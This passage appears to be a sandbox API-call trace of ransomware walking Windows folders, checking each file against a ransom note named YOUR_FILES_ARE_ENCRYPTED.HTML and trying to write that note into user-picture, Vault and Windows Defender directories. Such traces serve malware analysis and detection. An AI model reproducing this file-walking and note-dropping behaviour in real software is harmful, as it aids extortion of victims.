nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile37.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b3766e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b3766e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf244e2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile38.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b5d7d6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b5d7d6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf247441c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile39.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b8393e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b8393e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile40.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba9aa6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52ba9aa6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile41.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bcfc0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bcfc0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf257edbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile42.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bf5d76, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bf5d76, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25a4f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile43.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0169.977] lstrlenW (lpString=".bmp") returned 4 [0169.977] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 86 [0169.977] lstrcmpW (lpString1="usertile44.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.977] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0169.977] lstrlenW (lpString=".bmp") returned 4 [0169.977] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf6a360, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0169.977] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf6a360, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.977] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0169.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetProcessHeap () returned 0x270000 [0169.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0169.978] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned 64 [0169.978] lstrcmpW (lpString1="guest.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.978] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0169.978] lstrlenW (lpString=".bmp") returned 4 [0169.979] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned 63 [0169.979] lstrcmpW (lpString1="user.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.979] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0169.979] lstrlenW (lpString=".bmp") returned 4 [0169.979] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf904c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.979] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf904c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.979] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.979] GetProcessHeap () returned 0x270000 [0169.980] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.980] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned 38 [0169.980] GetProcessHeap () returned 0x270000 [0169.980] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.980] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" [0169.980] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*" [0169.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc028a40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.982] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.982] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.982] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.982] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.982] GetProcessHeap () returned 0x270000 [0169.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.983] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned 49 [0169.983] GetProcessHeap () returned 0x270000 [0169.983] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.983] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" [0169.983] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*" [0169.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc0e7120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0e7120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.984] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned 68 [0169.984] GetProcessHeap () returned 0x270000 [0169.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.984] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0169.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*" [0169.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.984] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 75 [0169.984] GetProcessHeap () returned 0x270000 [0169.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.984] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0169.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0169.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc04eba0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc04eba0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.985] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0169.985] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.985] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.986] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0169.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.987] GetProcessHeap () returned 0x270000 [0169.988] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.988] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 76 [0169.988] GetProcessHeap () returned 0x270000 [0169.988] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.988] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0169.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0169.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.988] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0169.988] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.988] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.988] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0169.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.989] GetProcessHeap () returned 0x270000 